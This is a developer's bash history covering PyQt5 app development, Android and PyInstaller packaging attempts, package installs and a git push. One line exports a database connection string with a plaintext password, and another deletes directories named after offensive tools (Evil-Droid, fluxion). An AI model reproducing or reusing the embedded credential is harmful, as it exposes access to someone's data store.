 1630  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/chat.py
 1631  ls Videos/PyQt5\ Python\ 3\ Tutorial/
 1632  sudo apt install pyqt5*
 1633  cd Code/team_project/pyqt5
 1635  ./team_project
 1636  mv pyqt5 ../
 1637  ..
 1641  pip install pyqtdeploy
 1646  pip install pqt5-tools
 1653  pyuic5
 1654  pyuic5 -x test.ui -o test.py
 1655  pyuic5 -x test.ui -o testmenu.py
 1656  cat testmenu.py
 1657  pyuic5 -x test.ui -o testimg.py
 1658  pyuic5 -x popup.ui -o testpopup.py
 1659  cd pyscripts
 1661  python3 yt_dl.py
 1665  sudo apt-get install sdkmanager
 1666  sudo apt-get install android-sdk
 1668  sudo sdkmanager
 1669  cd client
 1670  ls -aHl
 1671  ls -aH
 1675  cd server
 1676  cd .buildozer
 1677  cd android
 1679  cd app
 1684  sudo apt-get install clang make zlib1g zlib1g-dev libbz2-dev libssl-dev openjdk-8-jdk build-essential git
 1685  sudo apt-get install clang make zlib1g zlib1g-dev libbz2-dev libssl-dev build-essential git
 1688  unzip android-ndk-r25c-linux.zip
 1690  unzip Downloads/android-ndk-r25c-linux.zip
 1691  rm -rf Code/team_project/client/.buildozer
 1692  rm -rf Code/team_project/server/.buildozer
 1693  rm -rf Code/team_project/server/bin
 1694  rm -rf Code/team_project/client/bin/
 1695  cd android-ndk-r25c
 1697  build/ndk-build
 1698  build/ndk-build.cmd
 1699  ndk-build
 1700  ./ndk-build
 1702  mv /opt/android-sdk 
 1704  mv Downloads/android-ndk-r25c-linux.zip /opt
 1705  sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 libbz2-1.0:i386
 1706  tar  -xvf ~/Downloads/android-studio-2022.1.1.21-linux.tar.gz
 1708  ./bin/studio.sh
 1710  df -HT /mnt/C45AC4E35AC4D37A
 1718  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/main.py
 1719  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/test.py
 1720  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/testmenu.py
 1721  pip show pyqt5
 1724  pyqtdeploy-build testmenu.yml android-qt5 --target android-32
 1725  pyqtdeploy-build testmenu.yml testmenu.py --target android-32
 1726  pyqtdeploy-build myproject.yml --target android-32
 1727  pyqtdeploy-build testmenu.yml --target android-32
 1728  pyqtdeploy-sysroot
 1729  pyqtdeploy-sysroot testmenu.yml testmenu.py --target android-32
 1730  pyqtdeploy-sysroot testmenu.yml 
 1731  pyqtdeploy
 1732  pyqtdeploy-sysroot testmenu.yml --target android-32
 1733  adb
 1734  ~/Android/tools/tools/bin/sdkmanager --update
 1735  ~/Android/clear
 1737  sdkmanager
 1738  sdkmanager --update
 1741  pyqtdeploy-sysroot --target android-64 --source-dir sources/ --source-dir $QT_DIR --verbose sysroot.json
 1742  pyqtdeploy-sysroot --target android-64 --source-dir $QT_DIR --verbose sysroot.json
 1743  touch sysroot.json
 1744  export ANDROID_NDK_ROOT=/home/aegis/android-ndk-r25c
 1745  export ANDROID_NDK_ROOT=/home/aegis/Android/Sdk/ndk
 1746  export ANDROID_NDK_PLATFORM=android-29
 1748  export ANDROID_SDK_ROOT=/home/aegis/Android/Sdk
 1749  pyqtdeploy-sysroot --target android-64 --verbose sysroot.json
 1751  cd Code
 1752  mkdir tuts
 1753  cd tuts
 1754  python3 -m venv venv
 1755  pip install fbs-tutorial
 1757  fbs startproject
 1758  fbs run
 1759  fbs installer
 1760  fbs freeze
 1762  cd pyqt5
 1763  rm -rf ../tuts
 1764  source venv/bin/activate
 1765  pip install pyinstaller
 1766  pyinstaller --onefile --hidden-import=_bootlocale testmenu.py
 1768  python3.10 -m virtualenv .venv
 1769  python3.10 -m venv virtualenv .venv
 1770  rm -rf virtualenv 
 1771  pyinstaller --onefile --exclude-module _bootlocale testmenu.py
 1772  pip3.10 install --upgrade pyinstaller\n
 1773  pip3.10 install --upgrade pip
 1774  pip3.10 install cython3
 1775  pip3.10 install wheel
 1776  sudo apt-get install python3-dev
 1777  sudo apt-get install setuptools
 1778  rm -rf build dist sysroot.json
 1779  pyinstaller --onefile testmenu.py
 1781  cat requirements.txt
 1784  pip3 install cpython cython
 1785  pip3 install wheel
 1786  pip3 install pyinstaller
 1787  rm -rf build .venv/ dist 
 1788  rm -rf build .venv/ dist testmenu.spec 
 1789  rm -rf build .venv/ dist testmenu.spec testmenu.yml
 1790  python3.10 -m venv .venv
 1792  pip3.10 install cpython
 1793  pip3.10 install cython
 1794  pip3.10 install pyqt5
 1795  pyinstaller --onefile --windowed testmenu.py --exclude-module _bootlocale
 1796  pip3.10 install https://github.com/rokm/pyinstaller/archive/refs/heads/python-3.10.zip\n
 1798  sudo apt-get install libicu56
 1799  sudo apt-get install libicu-dev
 1802  pip3 install --upgrade pip\n
 1803  pip install pyqt5 pyinstaller
 1804  sudo apt-get install python3-pyinstaller
 1806  python3 install pyqt5
 1807  sudo apt-get install pyqt5
 1811  python3.10 -m venv .venv && source .venv/bin/activate
 1812  pip3.10 install --upgrade pip\n
 1813  pip3.10 install pyqt5 pyinstaller
 1814  pyinstaller --onefile --windowed testmenu.py
 1815  echo $LD_LIBRARY_PATH
 1816  sudo apt-get install python3-dev 
 1817  sudo apt-get install python-dev 
 1818  sudo apt-get install python3.11-dev
 1819  reset
 1820  gedit .zsh_history
 1822  rm -rf build .venv/ dist testmenu.spec testmenu.yml 
 1823  android
 1824  sdptool
 1825  pkms
 1826  export DATABASE_URL="postgresql://scholar:ScholarPass@localhost:5432/coursework"
 1827  serve
 1828  sudo service postgresql stop
 1829  sudo service nginx stop
 1832  sudo flatpak uninstall com.spotify.Client
 1833  curl -sS https://download.spotify.com/debian/pubkey_7A3A762FAFD4A51F.gpg | sudo gpg --dearmor --yes -o /etc/apt/trusted.gpg.d/spotify.gpg && echo "deb http://repository.spotify.com stable non-free" | sudo tee /etc/apt/sources.list.d/spotify.list\n
 1835  sudo apt-get update && sudo apt-get install spotify-client
 1836  sudo apt-get install spotify-client
 1837  sudo apt-get install spotify-clien*
 1838  sudo apt-get install spotify-client-qt
 1839  spotify
 1840  sudo spotify
 1841  sudo apt-get upgrade -y
 1842  sudo apt-get dist-upgrade -y
 1843  clea
 1844  reboot
 1845  /bin/python /home/aegis/Code/pyqt5/login.py
 1846  sudo apt-get install spotify-client-0.9.17
 1847  sudo apt-get install spotify-client-gnome-support
 1848  sudo apt-get install xfce4*
 1849  sudo apt-get remove --purge spotify-client*
 1850  sudo gnome-software
 1851  cd Code/pyqt5
 1855  Code/pyqt5/
 1857  cd ..
 1858  cp form_val/* pyqt5
 1862  python3 -m venv .venv && source .venv/bin/activate
 1864  history
 1865  pyuic5 -x nigellogin.ui  -o nigellogin.py
 1871  source /home/aegis/Code/pyqt5/.venv/bin/activate
 1872  /home/aegis/Code/pyqt5/.venv/bin/python -m pip install -U black
 1873  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/nigellogin.py
 1874  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/signup.py
 1876  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/valsignup.py
 1877  pyuic5 -x nigellsignup.ui -o niggelsignup.py
 1879  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/testpopup.py
 1880  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/niggelsignup.py
 1882  rm -rf Code/team_project/server
 1883  rm -rf Code/team_project/client
 1885  Android/
 1886  Sdk
 1887  cd
 1888  cd android-studio/
 1889  cd bin
 1891  ./studio.sh
 1892  rm -rf ~/Android
 1893  rm -rf ~/android-studio
 1896  ls -a
 1897  rm -rf buildozer Evil-Droid_v2 fluxion ngrok
 1898  sudorm -rf buildozer Evil-Droid_v2 fluxion ngrok
 1899  sudo rm -rf buildozer Evil-Droid_v2 fluxion ngrok
 1903  ./qt-unified-linux-x64-4.5.2-online.run
 1904  sudo apt-get remove --purge wps-office
 1909  sudo apt-get install qt5-assistant
 1910  sudo apt-get install qt5ct
 1911  sudo apt-get install qt5-doc
 1912  cd Code/team_project
 1913  pip freeze | cut -d'=' -f1 
 1914  pip install wheel
 1915  sudo apt-get remove --purge qt5-assistant
 1921  pip install pyqt5 
 1923  pip install pyqt5-tools
 1924  sudo apt-get install qttools5-dev-tools\nsudo apt-get install qttools5-dev\n
 1925  sudo apt-get install qttools5-8
 1926  sudo apt-get install qttools5-*
 1927  rm -rf ~/.cache/pip
 1929  df -HT /
 1932  sudo apt-get remove --purge kdeconnect
 1934  sudo apt-get update 
 1936  sudo apt-get dist-upgrade -y 
 1938  python3 chat.py
 1939  sudo apt-get install qt6-base-*
 1940  sudo apt-get install qt6-tool*
 1941  designer
 1942  sudo apt-get install designer-qt6
 1943  designer-qt6
 1944  sudo apt-get remove --purge qt6-tool*
 1945  sudo apt-get remove --purge qt6-base-*
 1946  sudo apt-get autoremove --purge
 1947  sudo apt-get autoclean --purge
 1948  sudo apt-get autoclean
 1950  sudo apt-get update
 1951  sudo apt-get upgrade -y 
 1954  python3 test_files/client.py
 1956  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/main.py
 1957  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/valsignup.py
 1958  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/validation.py
 1959  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/niggelsignup.py
 1960  pip install black
 1961  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/testimg.py
 1962  pip uninstall black
 1967  pip install pyqt5
 1968  pip3 install pyqt6
 1969  pip3 install pyqt5
 1970  pip3 download pyqt5
 1971  pip3 install wheel 
 1972  pip3 install pyqt5 
 1973  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/test_files/test.py
 1974  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/test.py
 1975  rm -rf .git*
 1976  echo "# team_project" >> README.md && git init && git add . && git commit -m "first commit" && git branch -M main && git remote add origin https://github.com/nafdev01/team_project.git && git push -u origin main
 1977  pip install zeroconf
 1978  pip3 install zeroconf
 1981  pip install netifaces
 1983  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/test_files/server.py
 1984  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/test_files/client.py
 1986  history > history.txt
 1987  gedit history.txt
 1988  pyuic5 -x test_files/testlogin.ui -o login.py
 1991  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/qrcode.py
 1995  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/test_files/testmenu.py
 1997  pip install pyotp
 1999  sudo wget https://github.com/shiftkey/desktop/releases/download/release-3.1.1-linux1/GitHubDesktop-linux-3.1.1-linux1.deb
 2000  sudo gdebi GitHubDesktop-linux-3.1.1-linux1.deb
 2002  pip3 install ipython
 2003  pip install qrcode
 2004  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/2fa.py
 2005  pip install pil
 2008  pyuic5 -x test_files/twoFA.ui -o authenticate_qr.py
 2009  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/generate_qr.py
 2010  clear
 2011  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/two_factor.py
 2012  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/login.py
 2014  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/auth_signup.py
 2015  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/signup.py
 2017  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/chat.py
 2020  pip uninstall netifaces
 2021  pip uninstall zeroconf
 2022  pip uninstall asttoken
 2023  pip uninstall asttokens
 2024  pip uninstall *
 2025  deactivate
 2026  rm -rf .venv 
 2027  python3 -m venv .venv
 2028  source .venv/bin/activate
 2029  pip install pqt5 pyotp qrcode 
 2030  pip install ypqt5 pyotp qrcode 
 2031  pip install pyqt5 pyotp qrcode 
 2032  pip install ipython
 2033  pip freeze | cut -d'=' -f1 > requirements.txt
 2035  pip install pillow
 2036  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/authenticate_qr.py
 2037  cd Downloads
 2038  tar  -xvf pycharm-professional-2022.3.3.tar.gz
 2039  tar  -xvf jetbrains-toolbox-1.27.3.14493.tar.gz
 2040  cd jetbrains-toolbox-1.27.3.14493
 2041  ls
 2042  chmod +x jetbrains-toolbox
 2043  ./jetbrains-toolbox
 2045  source /home/aegis/Code/team_project/.venv/bin/activate
 2046  /home/aegis/Code/team_project/.venv/bin/python -m pip install -U black
